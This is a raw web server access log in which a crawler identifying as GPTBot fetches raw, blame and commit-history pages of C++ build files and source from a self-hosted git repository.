"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10525] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10527] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204056] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204058] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14854] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18931] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18935] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18933] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" -[17/Feb/2026:15:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" -[17/Feb/2026:15:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" -[17/Feb/2026:15:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" -[17/Feb/2026:15:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" -[17/Feb/2026:15:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" -[17/Feb/2026:15:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10712] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" -[17/Feb/2026:15:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" -[17/Feb/2026:15:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" -[17/Feb/2026:15:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" -[17/Feb/2026:15:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" -[17/Feb/2026:15:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49516] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" -[17/Feb/2026:15:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" -[17/Feb/2026:15:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" -[17/Feb/2026:15:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" -[17/Feb/2026:15:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" -[17/Feb/2026:15:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10412] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" -[17/Feb/2026:15:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" -[17/Feb/2026:15:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49520] [Gzip 26.22] [Sent-to 192.168.0.250] 